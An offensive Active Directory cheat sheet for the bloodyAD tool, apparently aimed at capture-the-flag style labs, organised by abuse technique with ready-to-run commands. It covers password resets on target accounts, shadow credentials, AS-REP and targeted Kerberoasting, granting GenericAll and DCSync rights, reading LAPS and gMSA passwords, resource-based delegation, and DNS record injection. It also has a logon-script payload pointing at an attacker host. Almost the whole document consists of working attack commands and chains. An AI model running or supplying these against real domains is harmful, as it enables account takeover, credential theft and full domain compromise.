bloodyAD is most useful when organized by abuse primitive, not just raw commands.
For each technique:
- Requirements = what rights/conditions you need
- How to discover it = exact commands to check
- When to use = when this path makes sense
- Command = exact
bloodyADabuse command - Follow-up = what to do next
- Verify = how to confirm it worked
Choosing the Correct TARGET Value
The value for TARGET depends on the object type.
Use the name for:
- users →
a.white - computers →
WEB01$ - groups →
Domain Admins
Use the Distinguished Name (DN) for:
- domain object →
DC=lab,DC=htb - OUs →
OU=Servers,DC=lab,DC=htb - special LDAP objects →
CN=NTDS Quotas,DC=lab,DC=htb
Fast rule
- User / Computer / Group → usually use the name
- OU / Domain / Special LDAP object → usually use the full DN
If unsure, search first and copy the DN
# User
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(sAMAccountName=a.white)'
# Computer
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(sAMAccountName=WEB01$)'
# Group
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(cn=Domain Admins)'
# OU
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(ou=Servers)'
# Special object
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(cn=NTDS Quotas)'
Use the returned distinguishedName if the simple name does not work.
Domain DN quick reference
Convert the domain name to a DN:
lab.htb→DC=lab,DC=htbpirate.htb→DC=pirate,DC=htb
Examples
# User
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' set password 'a.white' 'Password01!'
# Group
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' add groupMember 'Domain Admins' 'a.white'
# Domain object
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get object 'DC=lab,DC=htb' --attr ms-DS-MachineAccountQuota
# OU
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' set owner 'OU=Servers,DC=lab,DC=htb' 'a.white'
Common Discovery Commands
Use these first to understand what you can control.
Find writable objects / attributes
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
Retrieve full information about an object
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET'
Retrieve specific attributes from an object
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr servicePrincipalName userAccountControl member memberOf userPrincipalName mail scriptPath altSecurityIdentities msDS-ManagedPassword
Search for a specific object
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(sAMAccountName=TARGET)'
Search for users with SPNs
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(servicePrincipalName=*)'
Search for LAPS passwords
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Search for gMSA objects
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(msDS-ManagedPassword=*)'
User / Computer Object Abuse
Change Password
Reset the target user’s password and authenticate as them.
Requirements
GenericAll,GenericWrite, orForceChangePasswordover the target user
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'USER_TARGET'
When to use
- you want immediate access
- the target is a normal user account
- password reset noise is acceptable
- changing the password will not break a service
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'
Alternatives
rpcclient -U 'user%password' 10.10.10.10 -W DOMINIO -c 'setuserinfo2 USER_TARGET 23 Password01!'
net rpc password "USER_TARGET" "Password01!" -U 'dominio.htb/user%password' -S 10.10.10.10
powerview dominio.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainUserPassword -Identity 'USER_TARGET' -AccountPassword 'Password01!'
Follow-up
nxc smb 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'
evil-winrm -i 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'
Verify
nxc smb 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'
Notes
- noisy
- avoid on service accounts unless you know impact is acceptable
Shadow Credentials
Add a malicious key credential to the target and authenticate as them.
Requirements
GenericAllorGenericWriteover a user/computer- PKINIT-compatible path available
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET'
When to use
- password reset is too noisy
- you want account access without changing the password
- the target may be a service account
- you want a cleaner takeover path
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add shadowCredentials 'TARGET'
Alternatives
certipy shadow auto -username john.w -p 'Pack_Beneath_Solid9!' -account angela.w -target dc-01.darkcorp.htb
Follow-up
- get TGT
- recover NT hash
- pass-the-hash
- authenticate as target over SMB / WinRM / LDAP
Verify
- verify output from the shadow credential tooling
- test access as the compromised principal
Notes
- often cleaner than password reset
- great for service accounts and stealthier takeovers
Enable AS-REP Roasting
Set DONT_REQ_PREAUTH on a target user to make them AS-REP roastable.
Requirements
GenericAllorGenericWriteover the target user
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
When to use
- you want offline cracking instead of changing the password
- you suspect weak passwords
- you want a roastable artifact
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH
Follow-up
Request AS-REP material and crack offline.
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
Notes
- more situational than password reset
- good in weak-password environments
Enable a Disabled Account
Remove the ACCOUNTDISABLE flag from a disabled user.
Requirements
- control over the target user object
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
When to use
- the target is disabled but useful
- you plan to reset password or authenticate as them afterward
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' remove uac 'TARGET' -f ACCOUNTDISABLE
Follow-up
- reset the password
- add shadow credentials
- authenticate as the target
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
Add TRUSTED_TO_AUTH_FOR_DELEGATION
Enable protocol transition / constrained delegation-related UAC flag.
Requirements
- control over the target account
- a delegation chain where this matters
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl servicePrincipalName
When to use
- you already know you are building a delegation chain
- not a first-choice primitive unless the path is clear
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add uac 'TARGET' -f TRUSTED_TO_AUTH_FOR_DELEGATION
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
Notes
- advanced / chain-dependent
- most useful in delegation abuse paths
Targeted Kerberoast / Write SPN
Assign an SPN to a user and request a TGS for offline cracking.
Requirements
GenericAllorGenericWriteover the target user
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'target' --attr servicePrincipalName
When to use
- password reset is too noisy
- target may have a weak password
- you want offline cracking
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'domain/meow'
Follow-up
Request TGS and crack it offline.
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'target' --attr servicePrincipalName
Notes
- not instant access
- best when target password is likely crackable
Modify UPN
Change a user’s userPrincipalName.
Requirements
- control over the target user object
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object $old_upn --attr userPrincipalName
When to use
- UPN spoofing chain
- AD CS / certificate-related abuse
- identity confusion attack path
Command
bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn
Verify
bloodyAD --host $dc -d $domain -u $username -p $password get object $old_upn --attr userPrincipalName
Modify Mail
Modify the mail attribute on a user.
Requirements
- control over the target user object
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr mail
When to use
- certificate abuse chain
- ESC14-style identity mapping
- attribute-based impersonation path
Command
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local
Verify
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr mail
Modify altSecurityIdentities
Set altSecurityIdentities for X.509 / ESC-style abuse.
Requirements
- control over the target user object
- certificate abuse chain in play
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr altSecurityIdentities
When to use
- AD CS / ESC14 / X.509 mapping abuse
- you know the exact certificate mapping path
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'user_target' altSecurityIdentities -v 'X509:<I><.........>'
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'
Verify
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr altSecurityIdentities
Set Logon Script Path
Assign a malicious logon script path to a target user.
Requirements
- control over the target user object
- target likely to log on interactively
- reachable SMB share / payload path
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr scriptPath
When to use
- you want delayed execution
- target is likely to log on
- you want code execution or auth capture via logon behavior
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\<ATTACKER_IP>\malicious.bat'
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr scriptPath
Notes
- delayed, situational
- depends on victim logon behavior
Group Abuse
Add User to Group
Add a controlled user into a target group.
Requirements
- rights to modify group membership
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'GROUP_TARGET' --attr member
When to use
- the group grants meaningful access
- you want a direct privilege jump
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add groupMember 'GROUP_TARGET' 'USER_TARGET'
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'GROUP_TARGET' --attr member
Notes
- re-authenticate to pick up new membership
ACL / Ownership Abuse
Set Owner
Take ownership of an object.
Requirements
WriteOwnerover the target object
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_group
When to use
- you have
WriteOwnerbut not direct abuse rights yet - you want to convert ownership into ACL control
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
Follow-up
Grant GenericAll and then abuse the object.
Verify
- inspect object ownership with your preferred ACL tooling
Grant GenericAll
Grant a user full control over an object.
Requirements
- sufficient rights to modify the target object DACL
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
When to use
- after
WriteOwner - when you need full control before password reset / shadow creds / group abuse
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'usuario' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username
Follow-up
- password reset
- shadow credentials
- SPN write
- group membership abuse
Add DCSync Rights
Grant replication rights used for DCSync.
Requirements
- control over the domain object ACL
How to discover it
- identify write access to the domain naming context / domain object
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
When to use
- endgame / domain compromise
- you want direct credential replication
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dcsync 'OBJECT_TARGET'
Follow-up
Run DCSync with appropriate tooling.
Notes
- very high impact
- usually a finishing move
Password / Credential Reading
Read LAPS Password
Read legacy LAPS-managed local admin passwords.
Requirements
- read access to the LAPS attributes
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
When to use
- you want local admin on servers/workstations
- lateral movement through host compromise is the best path
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Follow-up
- SMB / WinRM / PsExec / WMIExec
- dump credentials
- hunt for sessions
Read GMSA Password
Read msDS-ManagedPassword from a gMSA account.
Requirements
- read access to the target gMSA object
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr msDS-ManagedPassword
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
Follow-up
- parse the blob
- authenticate as the gMSA
- enumerate where the gMSA is useful
Enumeration / Search / Recovery
Retrieve User / Object Information
Command
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
Find Writable Attributes / Objects
Command
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
Find Deleted Objects
Command
bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del
Notes
- use with caution in notes; pair with actual deleted-object search below
Extended Search Operations
Help
bloodyAD --host $dc -d $domain -u $username -p $password get search -h
Search tombstoned / deleted objects
bloodyAD --host $dc -d $domain -u $username -p $password -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
Restore a Deleted Object
Command
bloodyAD --host $dc -d $domain -u $username -p $password -k set restore $user_to_restore
Machine / Delegation Abuse
Enumerate MachineAccountQuota
Command
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota
Modify MachineAccountQuota
Command
bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10
Notes
- replace
DC=dc,DC=dcwith the actual domain DN, for example:
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'DC=dominio,DC=htb' --attr ms-DS-MachineAccountQuota
Create a New Computer Account
Requirements
- MachineAccountQuota > 0 or delegated rights to create computer objects
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota
Command
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
Follow-up
- use the machine account in RBCD / delegation chains
Add Resource-Based Constrained Delegation (RBCD)
Requirements
- write access over the target computer object
- a controlled computer account to delegate from
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DELEGATE_TO$'
Command
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Follow-up
- S4U / service ticket abuse
- impersonation to services on the target computer
DNS Abuse
Add / Register DNS Record
Requirements
- rights to create DNS records
How to discover it
-
determine if DNS write abuse is in the path
-
inspect permissions / try record creation in lab contexts
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dnsRecord <dns_record_target> <ATTACKER_IP>
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password add dnsRecord $record_name $attacker_ip
Follow-up
- relay
- spoofing
- coercion
- name resolution abuse
Common Chains
WriteOwner → GenericAll → Password Reset
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set password 'OBJECT_TARGET' 'Password01!'
WriteOwner → GenericAll → Shadow Credentials
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add shadowCredentials 'OBJECT_TARGET'
GenericWrite → SPN Write → Kerberoast
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'
Then request the service ticket and crack it offline.
Read LAPS → Local Admin
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Then authenticate to the target host using the recovered local admin password.
Add Computer → RBCD
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Then abuse S4U to impersonate users to services on the target computer.
Quick Reference
Discovery
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(sAMAccountName=TARGET)'
Password / Account
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' remove uac 'TARGET' -f ACCOUNTDISABLE
Group / ACL
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add groupMember 'GROUP_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'usuario' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dcsync 'OBJECT_TARGET'
Credentials / Roasting / Delegation
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add shadowCredentials 'target'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Attribute / AD CS / DNS
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\<ATTACKER_IP>\malicious.bat'
bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dnsRecord <dns_record_target> <ATTACKER_IP>